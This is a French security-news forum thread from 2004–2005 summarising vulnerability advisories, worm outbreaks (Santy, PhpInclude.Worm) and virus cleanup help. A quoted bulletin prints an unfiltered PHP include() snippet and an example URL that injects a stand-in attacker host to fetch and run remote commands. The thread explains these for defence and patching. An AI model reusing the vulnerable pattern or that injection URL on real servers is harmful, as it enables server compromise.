Forum |  HardWare.fr | News | Articles | PC | S'identifier | S'inscrire | Shop Recherche
3187 connectés 

Mot :   Pseudo :  
  Aller à la page :

Page :   1  2  3  4  5  ..  40  41  42  ..  65  66  67  68  69  70
Auteur Sujet :

[Veille Sécurité] : Actualité Virus et Failles [INFOS 15/08/07 14h58]

n°1850380
minipouss
un mini mini
Posté le 16-12-2004 à 12:15:43  profilanswer

Reprise du message précédent :
Voila un lien vers blabla@osa où MJules et Sly Angel en parlent (pour plus de détails)

edit : lien [:ddr555]

Message édité par minipouss le 16-12-2004 à 12:18:55
mood
Publicité
Posté le 16-12-2004 à 12:15:43  profilanswer

n°1850394
vanloque
\o/ Buy the dip Shinji ! \o/
Posté le 16-12-2004 à 12:25:50  profilanswer

merci ;)

---------------
-"The party told you to reject the evidence of your eyes and ears. It was their final, most essential command." – George Orwell, in 1984
n°1850779
Jovial
It's clobberin' time
Posté le 16-12-2004 à 17:16:05  profilanswer

pour info, Microsoft vient d'acquerir la compagnie anti-spyware GIANT software

http://www.giantcompany.com/intro. [...] /PIoe.aspx

n°1850876
minipouss
un mini mini
Posté le 16-12-2004 à 18:05:06  profilanswer

Merci pour l'info :jap:

Un patch important à mettre sous XP SP2 (je ne sais pas pourquoi il est Hors-cycle et surtout pourquoi il n'a pas de nom MS04-04?)

## Patch pour le SP2 ## Windows XP Service Pack 2 Firewall Critical Update (KB886185) Bulletin K-Otik 15/12/2004
Descriptif :

Citation :

Une vulnérabilité a été identifiée dans le Firewall intégré à Microsoft Windows XP Service Pack 2 (SP2), elle pourrait être exploitée par un attaquant distant afin de passer certaines restrictions sécuritaires. Si une exception du firewall est associée à l'étendue "Uniquement mon réseau (ou sous-réseau)", le pare-feu Windows peut considérer, en raison d'une mauvaise configuration interne des tables de routage, le réseau internet comme étant un sous-réseau local, ce qui autorisera les connexions entrantes depuis l'internet (dans la limite des exceptions associées au firewall).

Versions vulnérables :
XP SP2, XP Tablet PC Edition 2005, XP Media Center Edition SP2
Solution : appliquer le patch Mise à jour critique pour Windows XP (KB886185)

---------------
"Deux choses sont infinies : l'univers et la bêtise humaine, en ce qui concerne l'univers, je n'ai pas acquis la certitude absolue." Albert Einstein
n°1851540
vanloque
Posté le 17-12-2004 à 12:04:06  profilanswer

slt, dis minipouss,les derniers patchs (MS4-041 et quelques) correctifs, ils sont pas necessaires si on a aucun service pack? ils veulent pas s'installer du fait que je n'ai meme pas le SP1 et je n'ai pas trouvé d'autres versions...

---------------
-"The party told you to reject the evidence of your eyes and ears. It was their final, most essential command." – George Orwell, in 1984
n°1851553
minipouss
un mini mini
Posté le 17-12-2004 à 12:17:29  profilanswer

non y a marqué SP1 et SP2.  

le problème c'est est-ce ça veut dire que tu n'es pas vulnérable? ça métonnerai quand même ;)

---------------
"Deux choses sont infinies : l'univers et la bêtise humaine, en ce qui concerne l'univers, je n'ai pas acquis la certitude absolue." Albert Einstein
n°1851583
vanloque
Posté le 17-12-2004 à 12:39:11  profilanswer

oui,je parie que je suis vulnérable,mais ça veut dire que si on veut pas de leurs packs,on l'a dans le derche :/
au prochain format j'installerai xp avec sp1 et je ferai les mises à jour,mais pour le sp2 ils peuvent se brosser,je suis tres content de mon firewall :D
dis, ya pas moyen d'avoir un GROS fichier qui regroupe toutes les MAJ de sécurité (en dehors des SP biensur) histoire de simplifier quand on veut installer toutes les MAJ apres une installe?

---------------
n°1851641
minipouss
un mini mini
Posté le 17-12-2004 à 13:18:00  profilanswer

ben tu peux le faire toi même si tu es assez bon pour comprendre le [Topic Unique] Installation automatisée de Windows 2000-XP-2003, moi je n'ai pas pris le temps encore de m'y plonger (et je ne suis pas certain de réussir à tout piger :D)

---------------
n°1852794
minipouss
un mini mini
Posté le 18-12-2004 à 14:58:16  profilanswer

Dernières nouvelles du front :

Mises à jour du Top10 Trend pour la période du 4 au 16 Décembre

Faille IE SP1/SP2 :

## IE et DHTML ## Internet Explorer DHTML Edit ActiveX Control Cross-Site Scripting Secunia Advisories 16/12/2004 , MSIE DHTML Edit Control Cross Site Scripting Vulnerability SecurityFocus Bugtraq 15/12/2004 et Microsoft IE dhtmled.ocx Lets Remote Users Execute Cross-Domain Scripting Attacks Alerte SecurityTracker 16/12/2004
Versions concernées : IE 6 SP1 et SP2
Descriptif : La vulnérabilité est due à une erreur dans le contrôle ActiveX d'edition DHTML quand il traite la fonction "execScript()" dans certaines situations. Cela peut être exploité pour exécuter du code arbitraire durant une session denavigation sur n'importe quel site.
Secunia a fait une page permettant de tester la vulnérabilité sur votre pc : http://secunia.com/internet_explor [...] lity_test/
Solution : Mettre le niveau de sécurité au plus haut (ce qui revient à désactiver le support ActiveX)

Vulnérabilité Computer Associates eTrust EZ Antivirus

## Faiblesse CA eTrust EZ Antivirus ## CA eTrust EZ Antivirus Insecure File Permissions Secunia Advisories 16/12/2004 , Computer Associates eTrust EZ Antivirus Insecure File Permission Vulnerability SecurityFocus Bugtraq 15/12/2004 et Computer Associates eTrust EZ Antivirus Unsafe Permissions Let Local Users Gain Elevated Privileges Alerte SecurityTracker 16/12/2004
Versions concernées : 7.0.0 à 7.0.4
Descriptif : Cette vulnérabilité peut être exploitée par un utilisateur local mal-intentionné pour outre-passer certaines restrictions de sécurité ou obtenir une augmentation des droits d'accès au pc. Le problème réside dans le fait que le logiciel donne par défaut des permissions non-sécurisées sur les fichiers installés. Cela permet à n'importe quel utilisateur du systéme de supprimer ou renommer ces fichiers (par exemple le fichier "VetMsg.exe", qui tourne en tant que service). Il est donc possible de désactiver la protection antivirus ou d'exécuter un code arbitraire avec les privilèges du système.
Solution : Mettre à jour vers la version 7.0.5 dispo à http://crm.my-etrust.com/CIDocumen [...] C0EF9C0703

Et un lien intéressant retraçant la sécurité virale sur l'année 2004 (par F-Secure) : http://www.f-secure.com/2004/

---------------
n°1854203
Rio Grande
bande de nains
Posté le 19-12-2004 à 22:49:08  profilanswer

Salut je fais un scan en ce moment avec PestPartrol et il a trouver un truc pas sympa du tout :D

voilà la déscription  
http://pestpatrol.com/PestInfo/h/h@tkeysh@@k.asp

je sais pas comment il est arrivé là mais il est là :/
--> DELETE !!! :o

Edit: et comme vous pouvez le voir il est tout fais puisque il est de ce mois  :D

Message édité par Rio Grande le 19-12-2004 à 22:50:05

---------------
Topics : NFSU2 - NFS : Most Wanted - Volant PC Site :  NFS-Mania.com
mood
Publicité
Posté le 19-12-2004 à 22:49:08  profilanswer

n°1860403
minipouss
un mini mini
Posté le 23-12-2004 à 17:58:39  profilanswer

ils ne disent pas comment ça a pu venir, dommage :/

mais un bon firewall empêchera de toute façon ce keylogger d'envoyer les infos qu'il a chopées :)

Message édité par minipouss le 23-12-2004 à 18:03:25

---------------
n°1860427
Yoda_57
Marc, gagame, c'était mieux
Posté le 23-12-2004 à 18:16:32  profilanswer

Rio Grande a écrit :

Salut je fais un scan en ce moment avec PestPartrol et il a trouver un truc pas sympa du tout :D

voilà la déscription  
http://pestpatrol.com/PestInfo/h/h@tkeysh@@k.asp

je sais pas comment il est arrivé là mais il est là :/
--> DELETE !!! :o

Edit: et comme vous pouvez le voir il est tout fais puisque il est de ce mois  :D

J'ai chopé le même (constaté il y a 2 jours)

---------------
Art ?|Pro ?|Sport ?| ACH/VDS matos photo divers
n°1861810
minipouss
un mini mini
Posté le 24-12-2004 à 17:28:56  profilanswer

Annonce virus (pas pour les particuliers, juste les forums) :

/!\ un ver bien Santy vise les forums phpBB /!\ Perl.Santy (Symantec), PERL/Santy.worm (Mac Afee) , Perl/Santy-A (Sophos) , WORM_SANTY.A (Trend) et Santy (F-Secure)
Grosse alerte : Un ver informatique attaque des sites web via une faille phpBB Bulletin K-Otik 21/12/2004 et Alerte Secuser

Citation :

Le nouveau ver informatique Santy.a se propage actuellement sur internet, il ne s'agit pas d'un virus de type mass-mailing, il est question d'un Web-Worm. Santy.a a pour but (visible) de défigurer automatiquement des sites web hébergeant un forum phpBB (versions <= 2.0.10) en exploitant la vulnérabilité "highlight SQL Injection" présente au niveau du fichier "viewtopic.php". Note : ce ver, dans sa version actuelle, ne représente aucune menace pour les utilisateurs se rendant sur un site compromis

Santy.a s'autocopie dans le serveur compromis sous le nom "m1ho2of", il identifie ensuite des nouvelles cibles potentielles via le moteur de recherche Google (en utilisant le terme "viewtopic.php" ). Plusieurs milliers de sites (40.000) ont d'ores et déjà été détournés, les pages ".htm", ".php", ".asp", ".shtm", ".jsp" et ".phtm" sont modifiées et remplacées par le code suivant : This site is defaced!!! NeverEverNoSanity WebWorm generation x. (où X représente la génération de l'infection).

Il existe actuellement plus de 6 Millions de forums potentiellement vulnérables à cette attaque (d'où un risque qualifié d'Elevé par K-OTik Security). La menace pourrait être atténuée si Google bloquait la recherche des mots "viewtopic.php" et "phpBB".

Update : L'équipe technique de Google vient de bloquer les requêtes générées par Santy.a, ce qui empêchera l'identification et la compromission de nouveaux serveurs.

Solution

- Migrer vers phpBB version 2.0.11 ou modifier le fichier vulnérable.
- Nous recommandons fortement la mise à jour de PHP (utiliser 4.3.10 ou 5.0.3) car une autre vulnérabilité critique, non exploitée par ce ver, pourrait être, dans l'avenir, utilisée comme vecteur de propagation/compromission de serveurs web (sous PHP <= 4.3.9 ou <= 5.0.2).

Failles logiciels connus :  

## Faille WinRAR ## WinRAR Delete File Buffer Overflow Vulnerability Secunia Advisories 22/12/2004
Versions concernées : 2.x et 3.x (confirmé pour 3.40 et 3.41)
Descriptif : Cette vulnérabilité est due à une "erreur aux limites" dans la gestion des noms de fichier lors de la suppression de fichiers dans les archives. Cela peut être exploité pour créer un "buffer overflow" en amenant un utilisateur à effacer un fichier dans une archive malicieuse ouverte. Une exploitation réussie pourrait permettre l'exécution de codes arbitraires.
Solution : aucune à part ne pas effacer de fichiers dans une archive inconnue

## Vulnérabilité dans Spy Sweeper Enterprise ## Spy Sweeper Enterprise Privilege Escalation Vulnerability Secunia Advisories 21/12/2004 et Spy Sweeper Enterprise Windows Tray Icon Lets Local Users Gain Elevated Privileges Alerte SecurityTracker 22/12/2004
Versions concernées : 1.x (confirmé pour la 1.5.1 (Build 3698))
Descriptif : La vulnérabilité est due au fait que le processus "SpySweeperTray.exe" de Spy Sweeper Enterprise appelle la fonction 'aide' avec les privilèges du SYSTEM. Cela peut être exploité pour exécuter des commandes arbitraires sur le pc avec des privilèges élevés.
Solution : passer à la version 2.0

Grosse annonce de faille non patchée sous Windows et WMP

## Alerte importante : failles windows dévoilées et non patchées ## Identification de plusieurs failles non patchées sous Windows Alerte K-Otik 24/12/2004
Versions concernées : selon les failles
Descriptif : Trois failles non patchées ont été dévoilées

• Microsoft Windows LoadImage API Integer Buffer overflow (Bugtraq Securityfocus) et Microsoft Windows LoadImage API Remote overflow Vulnerability (Bulletin K-Otik) concerne XP SP1, NT et 2000 (toutes versions) et 2003. elle est détectée par Symantec sous le nom Bloodhound.Exploit.19

Citation :

Une vulnérabilité critique a été identifiée dans plusieurs versions de Windows, elle pourrait être exploitée par un attaquant distant afin de compromettre un système vulnérable. Le problème résulte d'une erreur présente au niveau de l'API LoadImage de la librairie USER32.lib, qui ne vérifie par correctement le champ "size" (taille) des fichiers BMP, CUR, ICO ou ANI, ce qui pourrait permettre l'exécution de commandes arbitraires distantes via une page HTML ou un email contenant une image forgée.

Important : Cette vulnérabilité concerne une librairie Windows, elle ne concerne donc pas uniquement Internet Explorer. Tous les logiciels utilisant cette librairie sont potentiellement vulnérables (y compris des navigateurs tiers ou des clients de courrier électronique).

• Microsoft Windows Kernel ANI File Parsing Crash and DOS Vulnerability (Bugtraq Securityfocus) et Microsoft Windows Kernel ANI File Parsing Remote DoS Vulnerability (Bulletin K-Otik) concerne XP SP1, NT et 2000 (toutes versions) et 2003.

Citation :

Une vulnérabilité a été identifiée dans plusieurs versions de Windows, elle pourrait être exploitée par un attaquant distant afin de causer un Déni de Service. Le problème résulte d'une erreur présente au niveau de la librairie chargée du traitement des fichiers ANI (curseurs animés), qui ne gère pas correctement les entêtes contenant un numéro de trame égal à "0", ce qui pourrait être exploité via un page HTML malicieuse afin de provoquer le crash du système.

• Microsoft Windows winhlp32.exe Heap Overflow Vulnerability (Bugtraq Securityfocus) et Microsoft Windows winhlp32.exe Heap Overflow Vulnerability (Bulletin K-Otik) concerne toutes versions de XP, NT, 2000 et 2003.

Citation :

Une vulnérabilité a été identifiée dans plusieurs versions de Windows, elle pourrait être exploitée par un attaquant afin de compromettre un système vulnérable. Le problème résulte d'une erreur présente au niveau de "winhlp32.exe" qui ne gère pas correctement les fichiers ".hlp" contenant des entêtes forgées, ce qui pourrait être exploité afin d'exécuter des commandes arbitraires en incitant un utilisateur à ouvrir un fichier malicieux.

Note : Même si cette vulnérabilité nécessite une forte interaction de la part de l'utilisateur, la possibilité d'exploitations automatiques ou semi-automatiques n'est pas à exclure, d'où un risque qualifié d'Elevé par K-OTik Security.

Solution : pas de solution pour le moment

## Windows Media Player et ActiveX ## Windows Media Player ActiveX Control Two Vulnerabilities Secunia Advisories 20/12/2004 , Microsoft Windows Media Player 9 Vulns SecurityFocus Bugtraq 15/12/2004 et Microsoft Windows Media Player setItemInfo Lets Remote Users Execute Arbitrary Code Alerte SecurityTracker 20/12/2004
      Versions concernées : WMP 9.x sur win2000 et XP SP1/SP2
      Descriptif : il y a deux problèmes

• Une erreudans la fonction "getItemInfoByAtom()" du contrôle ActiveX du Windows Media Player peut être exploitée par exemple par un site web malicieux pour déterminer la présence et la taille de fichiers locaux.
      • Certaines erreurs dans les fonctions "setItemInfo()" and "getItemInfo()" du contrôle ActiveX du Windows Media Player peuvent être exploitées par exemple par un site web malicieux pour modifier ou révéler des informations sur un fichier media local (ex. artiste, album et nom de chanson d'un fichier .wma).

Solution : pour XP on doit passer à la version 10 : http://www.microsoft.com/downloads [...] laylang=fr ; pour 2000 pas de nouvelle version donc il vaut mieux, comme de plus en plus souvent, mettre le niveau de sécurité au plus haut (ce qui revient à désactiver le support ActiveX)

mise à jour aussi du Top10 US-Cert et nouveau bulletin http://www.us-cert.gov/cas/bulletins/SB04-357.html

n°1862327
Yoda_57
Posté le 25-12-2004 à 08:29:27  profilanswer

minipouss a écrit :

Annonce virus (pas pour les particuliers, juste les forums) :

/!\ un ver bien Santy vise les forums phpBB /!\ Perl.Santy (Symantec), PERL/Santy.worm (Mac Afee) , Perl/Santy-A (Sophos) , WORM_SANTY.A (Trend) et Santy (F-Secure)
Grosse alerte : Un ver informatique attaque des sites web via une faille phpBB Bulletin K-Otik 21/12/2004 et Alerte Secuser
[quote] Le nouveau ver informatique Santy.a se propage actuellement sur internet, il ne s'agit pas d'un virus de type mass-mailing, il est question d'un Web-Worm. Santy.a a pour but (visible) de défigurer automatiquement des sites web hébergeant un forum phpBB (versions <= 2.0.10) en exploitant la vulnérabilité "highlight SQL Injection" présente au niveau du fichier "viewtopic.php". Note : ce ver, dans sa version actuelle, ne représente aucune menace pour les utilisateurs se rendant sur un site compromis

Santy.a s'autocopie dans le serveur compromis sous le nom "m1ho2of", il identifie ensuite des nouvelles cibles potentielles via le moteur de recherche Google (en utilisant le terme "viewtopic.php" ). Plusieurs milliers de sites (40.000) ont d'ores et déjà été détournés, les pages ".htm", ".php", ".asp", ".shtm", ".jsp" et ".phtm" sont modifiées et remplacées par le code suivant : This site is defaced!!! NeverEverNoSanity WebWorm generation x. (où X représente la génération de l'infection).

Il existe actuellement plus de 6 Millions de forums potentiellement vulnérables à cette attaque (d'où un risque qualifié d'Elevé par K-OTik Security). La menace pourrait être atténuée si Google bloquait la recherche des mots "viewtopic.php" et "phpBB".

Update : L'équipe technique de Google vient de bloquer les requêtes générées par Santy.a, ce qui empêchera l'identification et la compromission de nouveaux serveurs.

...

Attention à ce virus, ce que dit secuser n'est pas tout à fait juste. On a malheureusement testé en live ce ver en début de semaine sur divers forums...
1. Il utilise une exploit de PHP, pas de PHPBB
2. Il n'impacte pas seulement les PHPBB. Des forums IPB et SPIP par exemple ont été mis par terre également. Peut-être d'autres aussi, mais je ne le sais pas.
3. Une mise à jour de PHP en 5.0.3 s'impose...

Message édité par Yoda_57 le 25-12-2004 à 08:29:51

---------------
Art ?|Pro ?|Sport ?| ACH/VDS matos photo divers
n°1862342
minipouss
un mini mini
Posté le 25-12-2004 à 10:01:49  profilanswer

merci pour cette précision :jap:

mon quote n'est pas de secuser mais de K-Otik. Mais c'est vrai que K-Otik ne met pas suffisamment cela en avant (juste à la fin dans les solutions)  

je modifierai un peu pour la première page dans la journée

n°1873311
Schprounk9​9
Posté le 03-01-2005 à 10:45:08  profilanswer

Salut à tous
 :hello:  
Mon pc et ceux des collègues (le tout en réseau)est infecté par VBS/Redlof.A et .2 aussi
je n'arrive pas à trouver une bonne méthode pour supprimer cette crasse. Norton repère les fichiers infectés mais ne sait pas les nettoyer.

z'auriez pas un bon filon pour moi pour commencer l'année en beauté.
merci d'avance :jap:

n°1873315
BMenez
Posté le 03-01-2005 à 10:47:44  profilanswer

n°1874188
Schprounk9​9
Posté le 03-01-2005 à 19:33:17  profilanswer

oui, merci, y'a des infos  :D

seulement comme précisé plus haut, Norton les voit, mais ne les nettoie pas. [:aiua]  

n'y a-t-il pas d'autre log qui peut les croquer?
AVG aussi les voit mais ne sais rien faire ... :??:  
le scan se faisait en mode sans échec ...

n°1874206
Yoda_57
Posté le 03-01-2005 à 19:38:53  profilanswer

C'est pourtant marqué dans le lien donnéci-dessus qu'il faut effacer à la main:
1. les fichiers détectés par norton
2. les entrées dans la base de registre

Message édité par Yoda_57 le 03-01-2005 à 19:39:08
n°1874873
Schprounk9​9
Posté le 04-01-2005 à 09:34:18  profilanswer

[citation=1874206,1600,18][nom]Yoda_57 a écrit[/nom]C'est pourtant marqué dans le lien donnéci-dessus qu'il faut effacer [b]à la main:...

ce n'était pas marqué "à la main" et pour un non-spécialiste, ce n'est pas si évident: il y a aussi une fonction delete dans le logiciel de Norton.
Merci tout de même pour la précision. Je vais essayer cette méthode.

Sur un pc, y'a 2471 fichiers infectés ... si je dois effacer ça à la main j'en ai pour 5 ans. Y'a plus que le formatage à envisager alors?  :hello:

n°1875037
Yoda_57
Posté le 04-01-2005 à 11:45:02  profilanswer

Oups, tu as raison :jap: étant sur plusieurs pb de virus en ce moment, j'ai dû en mélanger 2.

Euh, clair que tu n'as pas fini avec autant de fichier infectés surtout qu'il faut de toutes façons les réinstaller après un par un...

n°1875741
minipouss
un mini mini
Posté le 04-01-2005 à 18:20:41  profilanswer

Voila les news de la rentrée (certaines datant des vacances :D)

Virus :

/!\ Un virus s'attaque aux erreurs php /!\ Le ver PhpInclude.Worm attaque les pages php insécurisées Bulletin K-Otik 26/12/2004
Perl.Lexac (Symantec) et  Perl/Spyski.worm (Mac Afee)

Citation :

Le nouveau ver PhpInclude.Worm se propage activement sur internet, il s'attaque à toute page dynamique non sécurisée. [Ce ver est détecté par certains antivirus comme étant la variante C ou E de Santy. Nous estimons que ce ver est totalement différent de la famille Santy (la seule similitude réside dans l'utilisation des moteurs de recherche), nous avons donc décidé de lui attribuer l'alias générique "PhpInclude.Worm"].

Contrairement à Santy, PhpInclude.Worm n'exploite pas les vulnérabilités phpBB, il exploite une palette plus large de failles dites "de programmation". Il recherche (via Google/Yahoo/AOL) des serveurs web dont les pages php utilisent les fonctions "include()" et "require()" de façon non-sécurisée. Comment ?

Ces fonctions sont normalement utilisées par les programmeurs afin d'inclure des pages web spécifiées en arguments. Malheureusement, la non vérification de ces arguments peut permettre l'inclusion et l'exécution de fichiers externes, et donc la compromission du serveur web :

-------- Exemple : vulnerable.php --------
if(isset($page))
{
  include($page);
}
-----------------------------------------------
La page ci-dessus ne filtre pas correctement la variable $page, elle permet donc l'inclusion puis l'exécution de scripts arbitraires distants : vulnerable.php?page=http://server_pirate/scriptmalicieux?cmd=commandes_malicieuses

PhpInclude.Worm recherche donc des pages du type "*.php?*=", puis tente d'y injecter différentes commandes permettant l'installation de robots IRC et la constitution d'une armée de machines zombies contrôlées par un groupe de pirates brésiliens.

Ces failles étant liées aux applications web et non pas à la plateforme ou à la version de PHP, PhpInclude.Worm et ses prochaines variantes continueront à se propager sur internet pendant de longs mois, d'où un risque qualifié d'Elevé par K-OTik Security.
.......
Solution pré-infection

Vérifier vos scripts php afin d'y détecter d'éventuelles vulnérabilités.

Solution post-infection

-> Si vous n'avez pas un accès "root", vous devez contacter votre hébergeur ou administrateur.

-> Si vous avez un accès "root" :

- Arrêter le serveur web afin d'éviter de nouvelles infections.
- Identifier les fichiers et les scripts malicieux (en cours d'exécution) puis tuer les processus perl ou sh anormaux.
- Faire une recherche exhaustive des fichiers modifiés ou installés.
- Effacer ces fichiers malicieux afin d'éviter les rebonds.
- Identifier et corriger les vulnérabilités ayant permis la compromission du serveur (voir logs web)

Failles mozilla et firefox :

## Spoofing sous Mozilla et Firefox ## Mozilla / Firefox Download Dialog Source Spoofing Vulnerability Bulletin K-Otik 04/01/2005 et Mozilla / Mozilla Firefox Download Dialog Source Spoofing Secunia Advisories 04/01/2005
Versions concernées : Mozilla 1.7.x (confirmé 1.7.3 sous Linux et 1.7.5 sous windows) et Firefox 1.0, les version inférieures sont sûrement concernées aussi
Description :

Citation :

Une vulnérabilité a été identifiée dans Mozilla / Firefox, elle pourrait être exploitée par un attaquant distant afin de spoofer l'adresse source d'un fichier à télécharger. Le problème résulte d'une erreur présente au niveau de la gestion des longs noms de sous-domaines, qui ne sont pas correctement affichés dans la fenêtre de téléchargement, ce qui pourrait être exploité afin de masquer l'adresse réelle d'un fichier à télécharger derrière une fausse adresse de confiance.

Solution : pas de solution pour le moment

## Problème sous Mozilla ## Heap overflow in Mozilla Browser <= 1.7.3 NNTP code. SecurityFocus Bugtraq 29/12/2004 , Mozilla Browser NNTP Protocol handling Buffer Overflow Vulnerability Bulletin K-Otik 30/12/2004 , Mozilla "MSG_UnEscapeSearchUrl()" Buffer Overflow Vulnerability Secunia Advisories 30/12/2004 et Mozilla Buffer Overflow in Processing NNTP URLs Lets Remote Users Execute Arbitrary Code Alerte SecurityTracker 30/12/2004
Versions concernées : 1.7.3 et inférieures
Description :

Citation :

Une vulnérabilité critique a été identifiée dans le navigateur Mozilla, elle pourrait être exploitée par un attaquant distant afin de compromettre un système vulnérable. Le problème de type heap overflow résulte d'une erreur présente au niveau de la fonction "MSG_UnEscapeSearchUrl()" (nsNNTPProtocol.cpp) qui ne gère pas correctement le protocole NNTP (Network News Transport Protocol), ce qui pourrait être exploité afin d'exécuter des commandes arbitraires distantes via une page HTML contenant une adresse "news://" forgée.

Solution : passer à la version 1.7.5 dispo à http://www.mozilla.org/products/mozilla1.x/

Failles IE :  

## IE et FTP ## Internet Explorer FTP Download Directory Traversal Vulnerability Bulletin K-Otik 04/01/2005 , Internet Explorer FTP Download Directory Traversal Secunia Advisories 03/01/2005 et Internet Explorer FTP download path disclosure SecurityFocus Bugtraq 30/12/2004  
Versions concernées : confirmé avec IE 5.01, 5.5 et 6 sous XP SP1 et 2k SP4 patchés (XP SP2 non vulnérable)
Descriptif :

Citation :

Une vulnérabilité a été identifiée dans Microsoft Internet Explorer, elle pourrait être exploitée par un attaquant afin de compromettre un système vulnérable. Le problème de type "Directory Traversal", résulte d'une erreur présente au niveau du transfert de fichiers en mode FTP, ce qui pourrait être exploité afin de placer des fichiers malicieux dans des répertoires arbitraires, en incitant un utilisateur à accéder à un serveur FTP forgé.

Lors de la sauvegarde d'un fichier provenant d'un serveur FTP dans un répertoire local, celui-ci est enregistré sous 'rép_local/nom_fichier'; donc si le nom du fichier contient '../', la destination réelle du fichier est modifiée et il peut être sauvegardé n'importe où sur le disque dur local. Même si il est impossible de créer un fichier dont le nom contient les caractères '../', un serveur FTP peut répondre une requête LIST avec ces caractères comme nom de fichier; donc un serveur FTP malicieux peut modifier l'emplacement de la sauvegarde d'un fichier.
Solution : Pas de solution à part changer de navigateur ou ne pas utiliser IE pour le ftp sur des serveurs non sûrs

## IE et Help ## Microsoft Internet Explorer HTML Help Control Local Zone Bypass Bulletin K-Otik 25/12/2004 , Microsoft Internet Explorer SP2 Fully Automated Remote Compromise SecurityFocus Bugtraq 25/12/2004 et Remote code execution with parameters without user interaction, even with XP SP2 SecurityFocus Bugtraq 28/12/2004  
Versions concernées : confirmé avec IE 6 sous XP SP1/SP2 et Server 2003
Descriptif :

Citation :

Une vulnérabilité critique a été identifiée dans Microsoft Internet Explorer, elle pourrait être exploitée par un attaquant distant afin de compromettre un système vulnérable. Le problème résulte d'une erreur présente au niveau de la zone locale qui ni filtre pas correctement les scripts externes s'ils sont injectés via différentes méthodes ADODB (ex. ADODB.Connection et ADODB.recordset), ce qui pourrait permettre le téléchargement/exécution automatique d'un fichier arbitraire (trojan, virus...) via une simple page web.
Update 1 : Les premières exploitations malicieuses de cette faille ont fait leur apparition ce week-end [ex. Trojan.Phel.A ].
Update 2 : Une nouvelle variante de cette vulnérabilité a été identifiée, elle permet l'exécution de commandes arbitraires avec les privilèges de l'utilisateur connecté.

Note : Aucune interaction de la part de l'utilisateur n'est nécessaire, d'où un risque qualifié par K-OTik Security de "Critique".

Solution : Mettre le niveau de sécurité de la zone Internet à "Elevé" ou changer de navigateur

n°1875762
minipouss
un mini mini
Posté le 04-01-2005 à 18:30:29  profilanswer

Info à lire. C'est pas tout neuf je pense mais utile quand même car ce moyen va se développer pour propager les virus exploitant les différentes failles non patchées de IE ou  Windows :/

http://www.pcworld.com/news/articl [...] 016,00.asp

en gros, il y a moyen simple de détourner des fichiers média (wma par exemple) pour faire aller un utilisateur sur une page web contenant par exemple des scripts malicieux exploitant des failles. Heureusement les éditeurs antivirus détectent de plus en plus ces exploitations de vulnérabilités.

Au fait, BONNE ANNEE à tous :hello:

n°1875785
BMenez
Posté le 04-01-2005 à 18:38:40  profilanswer

Bonne année Minipouss, et surtout "keep up the good work" pour 2005 ;)

Encore un peu pour bien attaquer :
http://www.securiteam.com/securitynews/6E00R2KC0C.html
http://ferruh.mavituna.com/article/?769

Message édité par BMenez le 04-01-2005 à 18:39:06
n°1875793
minipouss
un mini mini
Posté le 04-01-2005 à 18:44:03  profilanswer

Merci :D

pour le ftp en smtp ça manque de précision, dommage :(

pour celui des firewalls, j'en avais marre et je le gardais pour demain [:ddr555] donc j'ajouterai ton lien dans le message :jap:

n°1877487
Profil sup​primé
Posté le 05-01-2005 à 16:33:36  answer

Salut, j'ai un pote qui m'a envoyé un mail me disant qu'il a reçu un mail de ma part pour la nouvelle année avec le virus NETSKY en pièce jointe, il me conseille donc de checker mes disques durs...Bien sûr je n'ai envoyé aucun mail et dans ma liste de message envoyés, j'ai rien non plus

Mon compte e-mail est chez Yahoo, je ne le consulte que sur le site directement (pas de pop), cet ami est dans ma liste de contact, et mes pc ne semblent pas infectés après un scan antivirus...

Ca vient forcément de mes PC ou c'est quelqu'un qui nous a dans ses contacts :??:
Je recois aussi énormément messages avec "Mail Delivery (failure mon-adresse@yahoo.fr)" comme objet alors que j'ai rien envoyé [:gratgrat]

Merci :jap:

Message édité par Profil supprimé le 05-01-2005 à 16:35:01
n°1877527
BMenez
Posté le 05-01-2005 à 16:47:38  profilanswer

Certains vers envoient des messages en prenant leurs adresses dans les contacts-list pour brouiller les pistes.

n°1877824
piouPiouM
insomniak
Posté le 05-01-2005 à 19:06:56  profilanswer

Citation :

Full-disclosure français - Quatre mois de prison et 6000 euros requis contre Guillermito

Après deux années d'instruction, le procès de Guillaume Tena,
chercheur français en biologie végétale à Harvard (Etats-Unis) et
chasseur de failles de sécurité, s'est tenu hier à la 31ème Chambre
du Tribunal de Grande Instance de Paris, suite à une plainte contre
X déposée par un éditeur français de logiciels antivirus.

Tena s'est vu reprocher, entre autres, la publication d'un Proof of
Concept (Exploit) "reprenant et copiant une partie de la structure  
et/ou le code de l'antivirus" (désassemblage), violant ainsi l'article
335.2 du code de la propriété intellectuelle.

Le procureur de la République a requis quatre mois de prison avec
sursis et 6000 euros d'amende à l'encontre de Guillaume Tena.
Une peine que nous jugeons démesurée et qui pourrait, à l'avenir,
s'avérer dangereuse pour les professionnels et les chercheurs en
sécurité informatique. Le délibéré est fixé au 8 mars 2005.

http://www.k-otik.com/news/08312004.Guillermito.php

:|

n°1877870
BMenez
Posté le 05-01-2005 à 19:26:31  profilanswer

Ca suxe :/
En esperant que le délibéré soit plus clément.

n°1877885
vanloque
Posté le 05-01-2005 à 19:35:16  profilanswer

il aidait les concepteurs de l'antivirus en montrant une faille et il s'en prend plein la gueule? :/

---------------
n°1877930
BMenez
Posté le 05-01-2005 à 20:05:51  profilanswer

Ben il aidait les concepteurs mais pas les marketeux... :D

n°1877938
Profil sup​primé
Posté le 05-01-2005 à 20:12:08  answer

BMenez a écrit :

Certains vers envoient des messages en prenant leurs adresses dans les contacts-list pour brouiller les pistes.

Ok merci...

Donc ca vient pas forcémment de moi (j'ai aucune adresses e-mail qui trainent sur mes durs) ?

n°1877964
Mjules
Parle dans le vide
Posté le 05-01-2005 à 20:24:07  profilanswer

le problème, c'est que si éthiquement et moralement, ce que fait cette société est ignoble, au bout du compte, du point stricte de la loi, il est en tort.

---------------
Celui qui pose une question est idiot 5 minutes. Celui qui n'en pose pas le reste toute sa vie. |  Membre du grand complot pharmaceutico-médico-scientifico-judéo-maçonnique.
n°1877989
minipouss
un mini mini
Posté le 05-01-2005 à 20:33:57  profilanswer

Bienvenue pour ton retour ici PioupiouM  :hello:

où est la limite entre loi et éthique? pas évident à trouver :D

---------------
n°1878026
piouPiouM
insomniak
Posté le 05-01-2005 à 20:45:45  profilanswer

minipouss a écrit :

Bienvenue pour ton retour ici PioupiouM  :hello:

Yop minipouss :hello:

Message édité par piouPiouM le 05-01-2005 à 20:45:51

---------------
o(^_^o) Gimp4you : tutoriels pour Gimp 2 | Galerie (o^_^)o
n°1878176
minipouss
un mini mini
